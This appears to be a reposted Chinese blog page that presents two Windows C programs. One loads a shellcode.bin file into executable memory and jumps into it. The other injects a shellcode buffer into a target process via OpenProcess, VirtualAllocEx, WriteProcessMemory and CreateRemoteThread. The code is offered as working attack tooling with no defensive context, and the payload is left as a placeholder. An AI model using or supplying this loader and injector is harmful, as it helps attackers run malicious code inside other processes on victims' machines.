标签：bin fp Handle int ShellCode char 读入 NULL shellcode

 1 通过上方代码生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.
 2 
 3 #include <stdio.h>
 4 #include <Windows.h>
 5 
 6 int main(int argc, char * argv[])
 7 {
 8     HANDLE fp;
 9     unsigned char * fBuffer;
10     DWORD fSize, dwSize;
11 
12     fp = CreateFile(L"c://shellcode.bin", GENERIC_READ, FILE_SHARE_READ, NULL,
13         OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
14 
15     fSize = GetFileSize(fp, 0);
16     fBuffer = (unsigned char *)VirtualAlloc(NULL, fSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
17     ReadFile(fp, fBuffer, fSize, &dwSize, 0);
18     CloseHandle(fp);
19 
20     __asm
21     {
22         mov eax,fBuffer
23         push eax
24         ret
25         int 3
26     }
27     return 0;
28 }
29 ShellCode注入进程:
30 
31 #include <stdio.h>
32 #include <windows.h>
33 
34 unsigned char ShellCode[] = "shellcode代码";
35 
36 BOOL InjectShellCode(int Pid)
37 {
38     HANDLE Handle, remoteThread;
39     PVOID remoteBuffer;
40 
41     Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
42 
43     remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
44     WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);
45     remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
46     CloseHandle(Handle);
47 }
48 
49 
50 int main(int argc, char *argv[])
51 {
52     InjectShellCode(1024);
53     return 0;
54 }

标签：bin,fp,Handle,int,ShellCode,char,读入,NULL,shellcode
来源： https://www.cnblogs.com/admrty/p/15255661.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。